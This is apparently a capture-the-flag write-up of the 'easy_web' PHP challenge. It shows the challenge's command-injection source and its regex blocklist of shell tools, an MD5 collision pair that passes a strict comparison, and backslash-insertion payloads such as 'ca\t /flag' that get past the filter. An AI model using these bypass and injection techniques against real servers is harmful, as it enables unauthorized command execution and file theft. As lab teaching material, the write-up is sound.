飞雪团队
[安洵杯 2019]easy_web
Posted on 2022-2-12 14:35:42

<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>Opening the challenge shows a URL like ?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=; at the same time, look at the page source.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>There is an "MD5 is funny" here, which suggests the challenge very likely has to do with MD5.</p>
<p>Then I captured the request; there was nothing special in the headers, so I tried starting from the URL.</p>
<p>First, base64-decode that value once.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>After one decode it still looks like base64, so decode it again.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>Then hex-decode it, which gives</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
</pre>
</div>
<p>Encode index.php the same way:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
<p>Then enter it in the address bar.</p>
<p>Then view the source and decode the base64 string found in the page source:</p>
<div class="cnblogs_code">
<pre>&lt;?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '&lt;img src ="./ctf3.jpeg"&gt;';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "&lt;img src='data:image/gif;base64," . $txt . "'&gt;&lt;/img&gt;";
    echo "&lt;br&gt;";
}
echo $cmd;
echo "&lt;br&gt;";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", $cmd)) {
    echo("forbid ~");
    echo "&lt;br&gt;";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?&gt;
&lt;html&gt;
&lt;style&gt;
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
&lt;/style&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
<p>Combined with the earlier deduction, the key code is here:</p>
<div class="cnblogs_code">
<pre>    if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }</pre>
</div>
<p>This MD5 check is an MD5 "strong collision" case: the comparison is strict (===), so two genuinely different inputs with the same MD5 digest are needed.</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>With just this, the contents of cmd are treated as a command.</p>
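<p>As an added example that is not part of the original writeup, the Python below reproduces the img-parameter encoding used above (hex, then base64 twice, as in the 555.png and index.php steps) and checks that the two POST values just given really are different 64-byte strings with the same MD5. The names decode_img, encode_img and collision_report are my own.</p>

```python
import base64
import binascii
import hashlib
from urllib.parse import unquote_to_bytes

# Added example, not the challenge's own code. It mirrors the PHP line
#   $file = hex2bin(base64_decode(base64_decode($_GET['img'])));
# and checks the MD5 collision pair posted in the writeup.

def decode_img(param: str) -> str:
    """base64 -> base64 -> hex, the way the challenge turns img into a filename."""
    # PHP's base64_decode tolerates missing '=' padding (the challenge URL has
    # none); Python does not, so restore it before each decode.
    inner = base64.b64decode(param + "=" * (-len(param) % 4))
    hexed = base64.b64decode(inner + b"=" * (-len(inner) % 4))
    return binascii.unhexlify(hexed).decode()

def encode_img(filename: str) -> str:
    """Inverse of decode_img: hex the name, then base64 it twice."""
    hexed = binascii.hexlify(filename.encode())
    return base64.b64encode(base64.b64encode(hexed)).decode()

# The two url-encoded POST values (a and b) from the writeup.
A = ("%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7"
     "%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42"
     "%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2")
B = ("%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7"
     "%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42"
     "%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2")

def collision_report(a_enc: str, b_enc: str) -> dict:
    """Percent-decode both values as PHP would, then compare bytes and MD5s.
    The check (string)$a !== (string)$b && md5($a) === md5($b) passes only when
    same_bytes is False and same_md5 is True."""
    a, b = unquote_to_bytes(a_enc), unquote_to_bytes(b_enc)
    return {
        "len": (len(a), len(b)),
        "same_bytes": a == b,
        "same_md5": hashlib.md5(a).hexdigest() == hashlib.md5(b).hexdigest(),
        "diff_positions": [i for i, (x, y) in enumerate(zip(a, b)) if x != y],
    }

if __name__ == "__main__":
    print(decode_img("TXpVek5UTTFNbVUzTURabE5qYz0"))  # 555.png
    print(encode_img("index.php"))  # TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
    print(collision_report(A, B))
```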
<p>So the payload used was:</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>Because '\' is not blocked, the filter can be bypassed this way:</p>
<p>ls and l\s give the same result when the command is executed.</p>
<p>Then I found that /flag exists in the root directory.</p>
<p>So the payload:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
</pre>
</div>
<p>For this challenge, since it does not block sort and dir, listing can also be done with dir instead of ls, and cat can be replaced with sort.</p>